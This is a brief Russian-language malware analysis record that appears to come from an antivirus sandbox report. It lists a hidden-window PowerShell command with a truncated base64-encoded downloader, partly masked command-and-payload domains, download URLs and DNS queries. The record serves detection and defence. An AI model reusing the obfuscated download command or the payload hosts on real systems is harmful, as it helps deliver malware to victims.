Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6ADEAMABfAF8AXwA4AD0AKAAnAHIAXwAnACsAJwAzADYANABfACcAKwAnADkAXwAnACkAOwAkAG4AOAA5ADMAMgBfADEAXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AF8AMwAxADIANgAwAD...
- 'm-###ver.net':80
- 'me####lass.com.br':80
- 'ho###wave.com':80
- 'de###tetotal.mx':80
- 'de###tetotal.mx':443
- http://m-###ver.net/XzZ9cdayyT_v
- http://www.m-###ver.net/XzZ9cdayyT_v
- http://me####lass.com.br/yUxRqbdEI_sdqk
- http://www.me####lass.com.br/yUxRqbdEI_sdqk
- http://www.de###tetotal.mx/IvzeRlO3IbW9
- 'de###tetotal.mx':443
- DNS ASK m-###ver.net
- DNS ASK sa#####ksa.mazalat.net
- DNS ASK me####lass.com.br
- DNS ASK ho###wave.com
- DNS ASK de###tetotal.mx
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB6ADEAMABfAF8AXwA4AD0AKAAnAHIAXwAnACsAJwAzADYANABfACcAKwAnADkAXwAnACkAOwAkAG4AOAA5ADMAMgBfADEAXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AF8AMwAxADIANgAwAD...' (со скрытым окном)